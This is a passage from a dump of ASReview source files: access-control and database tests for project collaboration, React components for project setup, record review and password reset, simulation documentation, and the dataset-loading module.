project, user2)\n # signout user 1\n au.signout_user(client)\n # signin user 3 (not invited)\n au.signin_user(client, user3)\n # check team\n status_code, resp_data = au.list_collaborators(client, project)\n assert status_code == 404\n assert resp_data[\"message\"] == \"Request can not made by current user.\"\n\n\n# Test user3 can't remove collaboration\ndef test_user3_cant_delete_collaboration(setup_auth):\n client, _, user2, user3, project = setup_auth\n # invite\n au.invite(client, project, user2)\n # signout user 1\n au.signout_user(client)\n # signin user 2\n au.signin_user(client, user2)\n # accept invitation and signs out\n au.accept_invitation(client, project)\n au.signout_user(client)\n # user 3 signs up\n au.signin_user(client, user3)\n # remove from team\n status_code, resp_data = au.delete_collaboration(client, project, user2)\n assert status_code == 404\n assert resp_data[\"message\"] == \"Request can not made by current user.\"\n" }, { "alpha_fraction": 0.5223262310028076, "alphanum_fraction": 0.5295282602310181, "avg_line_length": 30.378530502319336, "blob_id": "90a469ce35571e0aaff05cd353020f41c9fc1209", "content_id": "737fbdf70e2a2173baaed6ddbcbf4ce29942bd6c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 5554, "license_type": "permissive", "max_line_length": 84, "num_lines": 177, "path": "/asreview/webapp/src/ProjectComponents/SetupComponents/FinishSetup.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport ReactLoading from \"react-loading\";\nimport { useMutation, useQueryClient } from \"react-query\";\nimport { connect } from \"react-redux\";\nimport { useNavigate } from \"react-router-dom\";\nimport YouTube from \"react-youtube\";\n\nimport { Button, Fade, Stack, Typography } from \"@mui/material\";\nimport { styled, useTheme } from \"@mui/material/styles\";\n\nimport { InlineErrorHandler } from \"../../Components\";\nimport { TypographySubtitle1Medium } from \"../../StyledComponents/StyledTypography\";\nimport { ProjectAPI } from \"../../api\";\nimport {\n mapStateToProps,\n mapDispatchToProps,\n projectModes,\n projectStatuses,\n} from \"../../globals.js\";\n\nlet width = window.screen.width;\n\nconst YouTubeVideoID = \"k-a2SCq-LtA\";\n\nconst PREFIX = \"FinishSetup\";\n\nconst classes = {\n root: `${PREFIX}-root`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n display: \"flex\",\n [`& .${classes.root}`]: {\n alignItems: \"center\",\n },\n}));\n\nconst FinishSetup = (props) => {\n const navigate = useNavigate();\n const queryClient = useQueryClient();\n const theme = useTheme();\n\n const { error, isError, mutate } = useMutation(\n ProjectAPI.mutateProjectStatus,\n {\n onSuccess: () => {\n props.handleBack();\n queryClient.resetQueries(\"fetchProjectStatus\");\n },\n },\n );\n\n const onClickCloseSetup = async () => {\n props.toggleProjectSetup();\n console.log(\"Opening existing project \" + props.project_id);\n await queryClient.prefetchQuery(\n [\"fetchInfo\", { project_id: props.project_id }],\n ProjectAPI.fetchInfo,\n );\n if (props.mode !== projectModes.SIMULATION) {\n navigate(`/projects/${props.project_id}/review`);\n } else {\n navigate(`/projects/${props.project_id}`);\n }\n props.setProjectId(null);\n };\n\n const onClickClearError = () => {\n mutate({\n project_id: props.project_id,\n status: projectStatuses.SETUP,\n });\n };\n\n return (\n <Root>\n <Stack spacing={3}>\n {props.isStartTrainingError && (\n <InlineErrorHandler\n message={props.startTrainingError?.message}\n refetch={props.restartTraining}\n button={true}\n />\n )}\n {!props.isPreparingProject && props.isProjectReadyError && (\n <Stack className={classes.root} spacing={3}>\n <InlineErrorHandler message={props.projectReadyError?.message} />\n <Button onClick={onClickClearError}>Return to previous step</Button>\n </Stack>\n )}\n {isError && (\n <InlineErrorHandler\n message={error?.message}\n refetch={onClickClearError}\n button={true}\n />\n )}\n </Stack>\n <Stack spacing={3} className={classes.root}>\n {!props.isStartTrainingError && !props.isProjectReadyError && (\n <YouTube\n videoId={YouTubeVideoID}\n opts={{\n height: \"315\",\n width: width < 560 ? width - 48 : \"560\",\n playerVars: {\n rel: 0,\n },\n }}\n />\n )}\n {!props.isStartTrainingError &&\n !props.isProjectReadyError &&\n !props.trainingFinished && (\n <Stack className={classes.root} spacing={1}>\n <Stack className={classes.root}>\n <TypographySubtitle1Medium>\n Warming up the AI\n </TypographySubtitle1Medium>\n <Typography\n variant=\"body2\"\n sx={{\n color: \"text.secondary\",\n width: width < 560 ? \"90%\" : \"65%\",\n }}\n >\n ASReview LAB is extracting features from the text and training\n the classifier with selected prior knowledge. Learn more by\n watching the video.\n </Typography>\n </Stack>\n <ReactLoading\n type=\"bubbles\"\n color={theme.palette.primary.main}\n height={60}\n width={60}\n />\n </Stack>\n )}\n {props.trainingFinished && (\n <Stack spacing={3} className={classes.root}>\n {props.mode !== projectModes.SIMULATION && (\n <Fade in>\n <Stack spacing={3} className={classes.root}>\n <TypographySubtitle1Medium>\n AI is ready to assist you\n </TypographySubtitle1Medium>\n <Button onClick={onClickCloseSetup}>Start Reviewing</Button>\n </Stack>\n </Fade>\n )}\n {props.mode === projectModes.SIMULATION && (\n <Fade in>\n <Stack spacing={3} className={classes.root}>\n <Stack className={classes.root}>\n <TypographySubtitle1Medium>\n Your simulation project has been initiated\n </TypographySubtitle1Medium>\n <Typography\n variant=\"body2\"\n sx={{ color: \"text.secondary\" }}\n >\n It will take some time to complete the simulation\n </Typography>\n </Stack>\n <Button onClick={onClickCloseSetup}>Got it</Button>\n </Stack>\n </Fade>\n )}\n </Stack>\n )}\n </Stack>\n </Root>\n );\n};\n\nexport default connect(mapStateToProps, mapDispatchToProps)(FinishSetup);\n" }, { "alpha_fraction": 0.4591677486896515, "alphanum_fraction": 0.46384915709495544, "avg_line_length": 27.481481552124023, "blob_id": "89af239eeb76148881b2796454ed752c0cdc0382", "content_id": "7f7c6b51310be909f4c40b78c185da9147f39952", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 7690, "license_type": "permissive", "max_line_length": 83, "num_lines": 270, "path": "/asreview/webapp/src/ProjectComponents/ReviewComponents/RecordCard.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport clsx from \"clsx\";\nimport {\n Box,\n Button,\n Card,\n CardActions,\n CardContent,\n CircularProgress,\n Slide,\n Stack,\n Tooltip,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\nimport { Link } from \"@mui/icons-material\";\n\nimport { BoxErrorHandler } from \"../../Components\";\nimport { DOIIcon } from \"../../icons\";\nimport { NoteSheet } from \"../ReviewComponents\";\nimport { ExplorationModeRecordAlert } from \"../../StyledComponents/StyledAlert.js\";\nimport { StyledIconButton } from \"../../StyledComponents/StyledButton.js\";\n\nconst PREFIX = \"RecordCard\";\n\nconst classes = {\n loadedCard: `${PREFIX}-loadedCard`,\n loadingCard: `${PREFIX}-loadingCard`,\n titleAbstract: `${PREFIX}-titleAbstract`,\n title: `${PREFIX}-title`,\n abstract: `${PREFIX}-abstract`,\n note: `${PREFIX}-note`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n display: \"flex\",\n flex: \"1 0 auto\",\n margin: \"auto\",\n maxWidth: 960,\n padding: \"64px 0px 32px 0px\",\n height: \"100%\",\n [theme.breakpoints.down(\"md\")]: {\n padding: \"4px 0px\",\n },\n [`& .${classes.loadedCard}`]: {\n borderRadius: 16,\n display: \"flex\",\n flexDirection: \"column\",\n width: \"100%\",\n [theme.breakpoints.down(\"md\")]: {\n borderRadius: 0,\n },\n },\n\n [`& .${classes.loadingCard}`]: {\n justifyContent: \"center\",\n alignItems: \"center\",\n },\n\n [`& .${classes.titleAbstract}`]: {\n height: \"100%\",\n overflowY: \"scroll\",\n },\n\n [`& .${classes.title}`]: {\n lineHeight: 1.2,\n },\n\n [`& .${classes.abstract}`]: {\n whiteSpace: \"pre-line\",\n },\n\n [`& .${classes.note}`]: {\n justifyContent: \"flex-end\",\n },\n}));\n\nconst RecordCard = (props) => {\n const isDebugInclusion = () => {\n if (props.activeRecord) {\n return props.activeRecord._debug_label === 1;\n }\n };\n\n const expandNoteSheet = () => {\n props.setRecordNote((s) => {\n return {\n ...s,\n expand: true,\n shrink: false,\n };\n });\n };\n\n const shrinkNoteSheet = () => {\n props.setRecordNote((s) => {\n return {\n ...s,\n shrink: true,\n };\n });\n };\n\n return (\n <Root aria-label=\"record card\">\n {!props.isError && !props.activeRecord && (\n <Card\n elevation={2}\n className={clsx(classes.loadedCard, classes.loadingCard)}\n >\n <CardContent aria-label=\"record loading\">\n <CircularProgress />\n </CardContent>\n </Card>\n )}\n {props.isError && (\n <Card\n elevation={2}\n className={clsx(classes.loadedCard, classes.loadingCard)}\n aria-label=\"record loaded failure\"\n >\n <BoxErrorHandler queryKey=\"fetchRecord\" error={props.error} />\n </Card>\n )}\n {props.activeRecord && (\n <Card\n elevation={2}\n className={classes.loadedCard}\n aria-label=\"record loaded\"\n >\n {/* Previous decision alert */}\n {props.activeRecord._debug_label !== null && (\n <ExplorationModeRecordAlert\n label={!isDebugInclusion() ? \"irrelevant\" : \"relevant\"}\n />\n )}\n\n <CardContent\n className={`${classes.titleAbstract} record-card-content`}\n aria-label=\"record title abstract\"\n >\n <Stack spacing={1}>\n {/* Show the title */}\n <Typography\n component=\"div\"\n className={classes.title}\n variant={!props.mobileScreen ? \"h5\" : \"h6\"}\n sx={{\n fontWeight: (theme) => theme.typography.fontWeightRegular,\n }}\n >\n {/* No title, inplace text */}\n {(props.activeRecord.title === \"\" ||\n props.activeRecord.title === null) && (\n <Box\n className={\"fontSize\" + props.fontSize.label}\n fontStyle=\"italic\"\n >\n No title available\n </Box>\n )}\n\n {/* Show the title if available */}\n {!(\n props.activeRecord.title === \"\" ||\n props.activeRecord.title === null\n ) && (\n <Box className={\"fontSize\" + props.fontSize.label}>\n {props.activeRecord.title}\n </Box>\n )}\n </Typography>\n\n <Stack direction=\"row\" spacing={1}>\n {/* Show DOI if available */}\n {!(\n props.activeRecord.doi === undefined ||\n props.activeRecord.doi === null\n ) && (\n <StyledIconButton\n className=\"record-card-icon\"\n href={\"https://doi.org/\" + props.activeRecord.doi}\n target=\"_blank\"\n rel=\"noreferrer\"\n >\n <DOIIcon />\n </StyledIconButton>\n )}\n\n {/* Show URL if available */}\n {!(\n props.activeRecord.url === undefined ||\n props.activeRecord.url === null\n ) && (\n <Tooltip title=\"Open URL\">\n <StyledIconButton\n className=\"record-card-icon\"\n href={props.activeRecord.url}\n target=\"_blank\"\n rel=\"noreferrer\"\n >\n <Link />\n </StyledIconButton>\n </Tooltip>\n )}\n </Stack>\n {/* Show the abstract */}\n <Typography\n component=\"div\"\n className={\n classes.abstract + \" fontSize\" + props.fontSize.label\n }\n variant=\"body2\"\n paragraph\n sx={{ color: \"text.secondary\" }}\n >\n {/* No abstract, inplace text */}\n {(props.activeRecord.abstract === \"\" ||\n props.activeRecord.abstract === null) && (\n <Box fontStyle=\"italic\">No abstract available</Box>\n )}\n\n {/* Show the abstract if available */}\n {!(\n props.activeRecord.abstract === \"\" ||\n props.activeRecord.abstract === null\n ) && <Box>{props.activeRecord.abstract}</Box>}\n </Typography>\n </Stack>\n </CardContent>\n\n <Slide\n direction=\"up\"\n in={props.recordNote.expand}\n onExited={shrinkNoteSheet}\n mountOnEnter\n unmountOnExit\n >\n <Box>\n <NoteSheet\n note={props.recordNote.data}\n noteFieldAutoFocus={props.noteFieldAutoFocus}\n previousRecord={props.previousRecord}\n setRecordNote={props.setRecordNote}\n />\n </Box>\n </Slide>\n\n {props.recordNote.shrink && (\n <CardActions className={classes.note}>\n <Button\n disabled={props.disableButton()}\n size=\"small\"\n onClick={expandNoteSheet}\n aria-label=\"add note\"\n >\n {(props.previousRecord.show && props.previousRecord.note) ||\n props.recordNote.data\n ? \"Edit Note\"\n : \"Add Note\"}\n </Button>\n </CardActions>\n )}\n </Card>\n )}\n </Root>\n );\n};\n\nexport default RecordCard;\n" }, { "alpha_fraction": 0.6286248564720154, "alphanum_fraction": 0.6384471654891968, "avg_line_length": 34.63333511352539, "blob_id": "851cb589248bf8a26940492a4cf0a2e6a1d91c8d", "content_id": "ef6b27de3c05c33f1473ea3cea8cc3ceeacee08f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4276, "license_type": "permissive", "max_line_length": 77, "num_lines": 120, "path": "/asreview/webapp/tests/test_database_and_models/test_collaboration_models.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import pytest\nfrom sqlalchemy.exc import IntegrityError\n\nimport asreview.webapp.tests.utils.crud as crud\nfrom asreview.webapp import DB\nfrom asreview.webapp.authentication.models import Collaboration\nfrom asreview.webapp.authentication.models import CollaborationInvitation\n\n\nclass TestInvitations:\n \"\"\"Testing invitations on database level.\"\"\"\n\n # #############\n # CREATE\n # #############\n\n # test adding an invitation\n def test_adding_an_invitation(self, test_data):\n # get project\n project = test_data[\"user1\"].projects[0]\n # invite user 2\n project.pending_invitations.append(test_data[\"user2\"])\n DB.session.commit()\n\n assert crud.count_invitations() == 1\n # get fresh object\n invite = crud.last_invitation()\n # asserts Invitations\n assert invite.project_id == project.id\n assert invite.user_id == test_data[\"user2\"].id\n\n # test uniqueness of invitations\n def test_uniqueness_of_invitations(self, test_data):\n user1 = test_data[\"user1\"]\n user2 = test_data[\"user2\"]\n project = user1.projects[0]\n crud.create_invitation(DB, project, user2)\n assert crud.count_invitations() == 1\n\n # create identical invitation\n with pytest.raises(IntegrityError):\n crud.create_invitation(DB, project, user2)\n # if all is well, we can't add the same invitation\n assert crud.count_invitations() == 1\n\n # test missing user is not permitted\n def test_missing_user_in_invitation(self, test_data):\n project = test_data[\"user1\"].projects[0]\n invite = CollaborationInvitation(project_id=project.id, user_id=None)\n DB.session.add(invite)\n with pytest.raises(IntegrityError):\n DB.session.commit()\n DB.session.rollback()\n assert crud.count_invitations() == 0\n\n # test missing project is not permitted\n def test_missing_project_in_invitation(self, test_data):\n user = test_data[\"user1\"]\n invite = CollaborationInvitation(project_id=None, user_id=user.id)\n DB.session.add(invite)\n with pytest.raises(IntegrityError):\n DB.session.commit()\n DB.session.rollback()\n assert crud.count_invitations() == 0\n\n\nclass TestCollaborations:\n \"\"\"Testing collaboration on database level.\"\"\"\n\n # #############\n # CREATE\n # #############\n\n # test adding a collaboration\n def test_create_collaboration(self, test_data):\n # get project\n project = test_data[\"user1\"].projects[0]\n # collaboration user 2\n project.collaborators.append(test_data[\"user2\"])\n DB.session.commit()\n assert crud.count_collaborations() == 1\n # get fresh objects\n collab = crud.last_collaboration()\n # asserts collaboration\n assert collab.project_id == project.id\n assert collab.user_id == test_data[\"user2\"].id\n\n # test uniqueness of collaboration\n def test_uniqueness_of_collaboration(self, test_data):\n user1 = test_data[\"user1\"]\n user2 = test_data[\"user2\"]\n project = user1.projects[0]\n crud.create_collaboration(DB, project, user2)\n assert crud.count_collaborations() == 1\n\n # create identical invitation\n with pytest.raises(IntegrityError):\n crud.create_collaboration(DB, project, user2)\n # if all is well, we can't add the same invitation\n assert crud.count_collaborations() == 1\n\n # test missing user is not permitted\n def test_missing_user_in_collaboration(self, test_data):\n project = test_data[\"user1\"].projects[0]\n invite = Collaboration(project_id=project.id, user_id=None)\n DB.session.add(invite)\n with pytest.raises(IntegrityError):\n DB.session.commit()\n DB.session.rollback()\n assert crud.count_collaborations() == 0\n\n # test missing project is not permitted\n def test_missing_project_in_collaboration(self, test_data):\n user = test_data[\"user1\"]\n invite = Collaboration(project_id=None, user_id=user.id)\n DB.session.add(invite)\n with pytest.raises(IntegrityError):\n DB.session.commit()\n DB.session.rollback()\n assert crud.count_collaborations() == 0\n" }, { "alpha_fraction": 0.7591947317123413, "alphanum_fraction": 0.7615176439285278, "avg_line_length": 48.67307662963867, "blob_id": "39b6cb2e145bca7e65612793aebf8247e1609b96", "content_id": "23641648f1d7a799193e9c20965b2f3fe17abde0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2583, "license_type": "permissive", "max_line_length": 493, "num_lines": 52, "path": "/docs/source/simulation_overview.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Overview\n========\n\nASReview LAB offers three different solutions to run simulations with the:\n\n- :ref:`Webapp (the frontend) <simulation_webapp:simulate via the webapp>`\n- :doc:`Command line interface <simulation_cli>`\n- :doc:`Python API <simulation_api_example>`\n\n\nWhat is a simulation?\n---------------------\n\nA simulation involves mimicking the screening process with a certain model. As\nit is already known which records are labeled as relevant, the software can\nautomatically reenact the screening process as if a human was labeling the\nrecords in interaction with the Active Learning model.\n\nWhy run a simulation?\n---------------------\n\nSimulating with ASReview LAB has multiple purposes. First, the performance of\none or multiple models can be measured by different metrics (see :ref:`Analyzing results <simulation_results:Analyzing results>`). A convenient one\nis that you can investigate the amount of work you could have saved by using\nactive learning compared to your manual screening process.\n\nSuppose you don't know which model to choose for a new (unlabeled) dataset. In\nthat case, you can experiment with the best performing combination of the\nclassifier, feature extraction, query strategy, and balancing and test the\nperformance on a labeled dataset with similar characteristics.\n\nYou could also use the simulation mode to benchmark your own model against\nexisting models for different available datasets. ASReview LAB allows for adding\nnew models `via a template\n<https://github.com/asreview/template-extension-new-model>`_.\n\nYou can also find 'odd' relevant records in a 'classical' search. Such records\nare typically found isolated from most other records and might be worth closer\ninspection\n\nDatasets for simulation\n-----------------------\n\nSimulations require :ref:`fully labeled datasets <data_labeled:fully labeled data>` (labels: ``0`` = irrelevant, ``1`` = relevant). Such a dataset can be the result of an earlier study. ASReview offers also fully labeled datasets via the `benchmark platform <https://github.com/asreview/systematic-review-datasets>`_. These datasets are available via the user interface in the *Data* step of the setup and in the command line with the prefix `benchmark:` (e.g. `benchmark:van_de_schoot_2017`).\n\n.. tip::\n\n When you import your data, make sure to remove duplicates and to retrieve\n as many abstracts as possible (`See Importance-of-abstracts blog for help\n <https://asreview.ai/blog/the-importance-of-abstracts/>`_). With clean data you\n benefit most from what :doc:`active learning <about>`\n has to offer.\n" }, { "alpha_fraction": 0.47977980971336365, "alphanum_fraction": 0.4852847754955292, "avg_line_length": 26.782352447509766, "blob_id": "faee923bef336e0c72deb80516cc86d9d02a8d43", "content_id": "23420387b62930ecda615acd75e031377f7afc00", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4723, "license_type": "permissive", "max_line_length": 79, "num_lines": 170, "path": "/asreview/webapp/src/Components/ForgotPassword.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useSelector } from \"react-redux\";\nimport { useNavigate } from \"react-router-dom\";\nimport { useMutation, useQueryClient } from \"react-query\";\nimport {\n Box,\n Button,\n Card,\n CardContent,\n Fade,\n Stack,\n TextField,\n Typography,\n} from \"@mui/material\";\nimport LoadingButton from \"@mui/lab/LoadingButton\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { WordmarkState } from \"../globals\";\nimport { InlineErrorHandler } from \".\";\nimport AuthAPI from \"../api/AuthAPI\";\n\nconst PREFIX = \"SignInForm\";\n\nconst classes = {\n button: `${PREFIX}-button`,\n card: `${PREFIX}-card`,\n cardContent: `${PREFIX}-card-content`,\n checkbox: `${PREFIX}-checkbox`,\n header: `${PREFIX}-header`,\n logo: `${PREFIX}-logo`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n display: \"flex\",\n height: \"100%\",\n width: \"100%\",\n alignItems: \"center\",\n justifyContent: \"center\",\n position: \"absolute\",\n [`& .${classes.button}`]: {\n paddingTop: theme.spacing(3),\n paddingBottom: theme.spacing(3),\n justifyContent: \"space-between\",\n },\n\n [`& .${classes.card}`]: {\n borderRadius: theme.spacing(2),\n width: \"450px\",\n },\n\n [`& .${classes.cardContent}`]: {\n padding: \"48px 40px\",\n },\n\n [`& .${classes.header}`]: {\n alignItems: \"center\",\n },\n\n [`& .${classes.logo}`]: {\n width: \"100%\",\n maxWidth: \"130px\",\n },\n}));\n\nconst ForgotPassword = () => {\n const emailConfig = useSelector((state) => state.email_config) || false;\n const [email, setEmail] = React.useState(\"\");\n const [successMessage, setSuccessMessage] = React.useState(false);\n const queryClient = useQueryClient();\n const navigate = useNavigate();\n\n const { error, isError, isLoading, mutate, reset } = useMutation(\n AuthAPI.forgotPassword,\n {\n onMutate: () => {\n // clear potential error\n queryClient.resetQueries(\"refresh\");\n },\n onSuccess: (data) => {\n setEmail(\"\");\n setSuccessMessage(data.message);\n },\n onError: (data) => {\n console.error(\"Forgot password error\", data);\n },\n },\n );\n\n const handleSubmit = (event) => {\n event.preventDefault();\n reset();\n mutate({ email });\n };\n\n const handleEmailChange = (event) => {\n setEmail(event.target.value);\n };\n\n const handleSignin = (event) => {\n navigate(\"/signin\");\n };\n\n return (\n <Root>\n <Fade in>\n <Box>\n <Card className={classes.card} variant=\"outlined\">\n <CardContent className={classes.cardContent}>\n <Stack spacing={3}>\n <Stack className={classes.header} spacing={2}>\n <img\n className={classes.logo}\n src={WordmarkState()}\n alt=\"ASReview LAB\"\n />\n <Typography variant=\"h5\">Forgot your password?</Typography>\n {emailConfig && (\n <p>\n Enter your email address, click on the submit button and\n an email will be sent to you. Check your spam or bulk\n folder if you don't get an email.\n </p>\n )}\n {!emailConfig && (\n <p>Contact your ASReview-app administrator</p>\n )}\n </Stack>\n {emailConfig && (\n <>\n <Stack spacing={3}>\n <TextField\n label=\"Email\"\n value={email}\n onChange={handleEmailChange}\n variant=\"outlined\"\n fullWidth\n autoFocus\n />\n </Stack>\n {isError && <InlineErrorHandler message={error.message} />}\n {successMessage && <p>{successMessage}</p>}\n\n <Stack className={classes.button} direction=\"row\">\n <LoadingButton\n loading={isLoading}\n variant=\"contained\"\n color=\"primary\"\n onClick={handleSubmit}\n >\n Submit\n </LoadingButton>\n <Button\n onClick={handleSignin}\n sx={{ textTransform: \"none\" }}\n >\n Sign In instead\n </Button>\n </Stack>\n </>\n )}\n </Stack>\n </CardContent>\n </Card>\n </Box>\n </Fade>\n </Root>\n );\n};\n\nexport default ForgotPassword;\n" }, { "alpha_fraction": 0.49306225776672363, "alphanum_fraction": 0.5245586037635803, "avg_line_length": 36.33022689819336, "blob_id": "18fcd9b444c7e83266c3791be4cd069d2fa4bc4a", "content_id": "25c25ac0bd234cefdd68b026d3c027ff0d6e99a9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 28055, "license_type": "permissive", "max_line_length": 120, "num_lines": 751, "path": "/asreview/datasets.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nimport socket\nimport tempfile\nfrom abc import ABC\nfrom abc import abstractmethod\nfrom pathlib import Path\nfrom urllib.error import URLError\nfrom urllib.request import urlopen\nfrom urllib.request import urlretrieve\n\nimport synergy_dataset as sd\n\nfrom asreview.io import CSVReader\nfrom asreview.utils import _entry_points\nfrom asreview.utils import _get_filename_from_url\nfrom asreview.utils import is_iterable\n\n\nclass DatasetNotFoundError(Exception):\n pass\n\n\ndef _download_from_metadata(url):\n \"\"\"Download metadata to dataset.\"\"\"\n\n try:\n with urlopen(url, timeout=10) as f:\n meta_data = json.loads(f.read().decode())\n except URLError as e:\n if isinstance(e.reason, socket.timeout):\n raise Exception(\"Connection time out.\")\n raise e\n\n datasets = []\n for data in meta_data.values():\n # raise error on versioned datasets\n if \"type\" in data and data[\"type\"] == \"versioned\":\n raise ValueError(\"Datasets of type 'versioned' are deprecated\")\n\n datasets.append(BaseDataSet(**data))\n\n return datasets\n\n\nclass BaseDataSet:\n def __init__(\n self,\n dataset_id,\n filepath=None,\n title=None,\n description=None,\n authors=None,\n topic=None,\n link=None,\n reference=None,\n img_url=None,\n license=None,\n year=None,\n aliases=[],\n **kwargs,\n ):\n \"\"\"Base class for metadata of dataset.\n\n A BaseDataSet is a class with metadata about a (labeled)\n dataset used in ASReview LAB. The dataset can be used via\n the frontend or via command line interface.\n\n In general, a BaseDataSet is part of a group (BaseDataGroup).\n\n Examples\n --------\n\n The following example simulates a dataset with dataset_id\n 'cord19'. The name of the group is 'covid'.\n\n >>> asreview simulate covid:cord_19\n\n Parameters\n ----------\n dataset_id: str\n Identifier of the dataset. The value is a alphanumeric\n string used to indentify the dataset via the command line\n interface. Example: 'groupname:DATASET_ID' where DATASET_ID\n is the value of dataset_id.\n filepath: str\n Path to file or URL to the dataset. See\n asreview.readthedocs.io/{URL} for information about valid\n datasets.\n title: str\n Title of the dataset.\n description: str\n Description of the dataset. Optional.\n authors: list\n Authors of the dataset. Optional.\n topic: str\n Topics of the dataset. Optional.\n link: str\n Link to a website or additional information.\n reference: str\n (Academic) reference describing the dataset. Optional.\n license: str\n License of the dataset. Optional\n year: str\n Year of publication of the dataset. Optional.\n img_url: str\n Image for display in graphical interfaces. Optional.\n aliases: list\n Additional identifiers for the dataset_id. This can be\n useful for long of complex dataset_id's. Optional.\n\n \"\"\"\n\n self.dataset_id = dataset_id\n self.filepath = filepath\n self.title = title\n self.description = description\n self.authors = authors\n self.topic = topic\n self.link = link\n self.reference = reference\n self.license = license\n self.year = year\n self.img_url = img_url\n self.aliases = aliases\n self.kwargs = kwargs\n\n def __str__(self):\n return f\"<BaseDataSet dataset_id='{self.dataset_id}' title='{self.title}'>\"\n\n def __dict__(self):\n return {\n \"dataset_id\": self.dataset_id,\n \"filepath\": self.filepath,\n \"title\": self.title,\n \"description\": self.description,\n \"authors\": self.authors,\n \"topic\": self.topic,\n \"link\": self.link,\n \"reference\": self.reference,\n \"license\": self.license,\n \"year\": self.year,\n \"img_url\": self.img_url,\n \"aliases\": self.aliases,\n **self.kwargs,\n }\n\n @property\n def reader(self):\n return None\n\n @property\n def filename(self):\n if not hasattr(self, \"_filename\"):\n self._filename = _get_filename_from_url(self.filepath)\n\n return self._filename\n\n def to_file(self, path):\n # todo return without store\n urlretrieve(self.filepath, path)\n\n\nclass BaseDataGroup(ABC):\n def __init__(self, *datasets):\n \"\"\"Group of datasets.\n\n Group containing one or more datasets.\n\n Parameters\n ----------\n *datasets:\n One or more datasets.\n \"\"\"\n self.datasets = list(datasets)\n\n @property\n @abstractmethod\n def group_id(cls):\n pass\n\n @property\n @abstractmethod\n def description(cls):\n pass\n\n def __str__(self):\n return f\"<BaseDataGroup group_id='{self.group_id}'>\"\n\n def __dict__(self):\n return {d.dataset_id: d for d in self.datasets}\n\n def append(self, dataset):\n \"\"\"Append dataset to group.\n\n dataset: asreview.datasets.BaseDataSet\n A asreview BaseDataSet-like object.\n \"\"\"\n if not issubclass(dataset, BaseDataSet):\n raise ValueError(\"Expected BaseDataSet or subclass of BaseDataSet.\")\n self.datasets.append(dataset)\n\n def find(self, dataset_id):\n \"\"\"Find dataset in the group.\n\n Parameters\n ----------\n dataset_id: str\n Identifier of the dataset to look for. It can also be one\n of the aliases. Case insensitive.\n\n Returns\n -------\n asreview.datasets.BaseDataSet:\n Returns base dataset with the given dataset_id.\n \"\"\"\n results = []\n for d in self.datasets:\n if dataset_id.lower() == d.dataset_id.lower() or dataset_id.lower() in [\n a.lower() for a in d.aliases\n ]:\n results.append(d)\n\n if len(results) > 1:\n raise ValueError(\n f\"Broken dataset group '{self.group_id}' containing multiple\"\n f\" datasets with the same name/alias '{dataset_id}'.\"\n )\n elif len(results) == 1:\n return results[0]\n\n raise DatasetNotFoundError(f\"Dataset {dataset_id} not found\")\n\n\nclass DatasetManager:\n @property\n def groups(self):\n return list(_entry_points(group=\"asreview.datasets\").names)\n\n def find(self, dataset_id):\n \"\"\"Find a dataset.\n\n Parameters\n ----------\n dataset_id: str, iterable\n Look for this term in aliases within any dataset. A group can\n be specified by setting dataset_id to 'group_id:dataset_id'.\n This can be helpful if the dataset_id is not unique.\n The dataset_id can also be a non-string iterable, in which case\n a list will be returned with all terms.\n Dataset_ids should not contain semicolons (:).\n Return None if the dataset could not be found.\n\n Returns\n -------\n BaseDataSet:\n Return the dataset with dataset_id.\n \"\"\"\n # If dataset_id is a non-string iterable, return a list.\n if is_iterable(dataset_id):\n return [self.find(x) for x in dataset_id]\n\n # If dataset_id is a valid path, create a dataset from it.\n if Path(dataset_id).is_file():\n return BaseDataSet(dataset_id)\n\n dataset_id = str(dataset_id)\n\n # get installed dataset groups\n dataset_groups = _entry_points(group=\"asreview.datasets\")\n\n # Split into group/dataset if possible.\n split_dataset_id = dataset_id.split(\":\")\n if len(split_dataset_id) == 2:\n data_group = split_dataset_id[0]\n split_dataset_id = split_dataset_id[1]\n if data_group in self.groups:\n return dataset_groups[data_group].load()().find(split_dataset_id)\n\n # Look through all available/installed groups for the name.\n all_results = {}\n for data_group in dataset_groups:\n try:\n all_results[data_group.name] = data_group.load()().find(dataset_id)\n except Exception:\n # don't raise error on loading entry point\n pass\n\n # If we have multiple results, throw an error.\n if len(all_results) > 1:\n raise ValueError(\n f\"Multiple datasets found: {list(all_results)}.\"\n \"Use DATAGROUP:DATASET format to specify which one\"\n \" you want.\"\n )\n\n if len(all_results) == 1:\n return list(all_results.values())[0]\n\n # Could not find dataset\n raise DatasetNotFoundError(f\"Dataset {dataset_id} not found\")\n\n def list(self, include=None, exclude=None, serialize=True, raise_on_error=False):\n \"\"\"List the available datasets.\n\n Parameters\n ----------\n include: str, iterable\n List of groups to include\n exclude: str, iterable\n List of groups 